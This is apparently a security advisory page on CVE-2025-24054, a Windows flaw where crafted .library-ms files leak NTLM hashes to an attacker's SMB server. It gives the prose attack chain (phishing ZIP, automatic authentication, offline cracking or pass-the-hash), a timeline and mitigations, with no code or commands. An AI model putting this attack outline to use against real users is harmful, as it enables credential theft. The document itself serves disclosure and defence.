CVE-2025-24054, NTLM Exploit in the Wild
Last updated
Was this helpful?
Last updated
Was this helpful?
CVE-2025-24054 is a medium-severity vulnerability in Microsoft Windows that allows attackers to leak NTLM (NT LAN Manager) hashes through spoofing techniques. This flaw arises from improper handling of file paths in .library-ms files, enabling attackers to initiate unauthorized SMB (Server Message Block) authentication requests and capture sensitive user credentials.
CVE ID: CVE-2025-24054
Severity: Medium (CVSS 3.1 Score: 6.5)
Affected Component: Windows NTLM Authentication
CWE Reference: CWE-73 – External Control of File Name or Path
Attack Vector: Network
User Interaction: Required (e.g., viewing a folder)
Privileges Required: None
Impact: Confidentiality breach via NTLM hash disclosure
The vulnerability exploits how Windows Explorer processes .library-ms files, which are XML-based files defining custom libraries. When such a file references a remote location (e.g., an attacker-controlled SMB share), merely previewing or navigating to the folder containing the file can trigger an automatic SMB authentication request. This request inadvertently sends the user's NTLM hash to the attacker's server, potentially compromising user credentials.
Notably, the exploit does not require the user to open or execute the malicious file; simple actions like right-clicking or hovering over the file are sufficient to trigger the vulnerability.
Attacker Setup: An attacker sets up a malicious SMB server to capture incoming NTLM authentication requests.
Malicious File Creation: The attacker crafts a .library-ms file that references the malicious SMB server.
Distribution: The malicious file is distributed via phishing emails, often compressed within a ZIP archive alongside other shortcut files like .url, .lnk, or .website.
User Interaction: When the victim extracts the archive or navigates to the folder containing the malicious file, Windows Explorer initiates an SMB authentication request to the attacker's server.
March 11, 2025: Microsoft releases a security patch addressing CVE-2025-24054.
March 19, 2025: Reports emerge of active exploitation in the wild, with attackers leveraging the vulnerability in phishing campaigns targeting organizations in Poland and Romania.
Apply Security Updates: Ensure that all Windows systems are updated with the latest security patches released by Microsoft on March 11, 2025.
Disable NTLM Authentication: Where feasible, disable NTLM authentication or restrict its use to minimize exposure.
Implement SMB Signing: Enforce SMB signing to prevent unauthorized SMB communication.
User Education: Train users to recognize and avoid suspicious emails and attachments, particularly those containing unexpected shortcut files.
Network Monitoring: Monitor network traffic for unusual SMB authentication requests, which may indicate exploitation attempts.
Credential Capture: The attacker's server captures the NTLM hash from the authentication request, which can then be used for offline brute-force attacks or pass-the-hash techniques to gain unauthorized access.
April 17, 2025: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds CVE-2025-24054 to its Known Exploited Vulnerabilities Catalog, urging immediate remediation.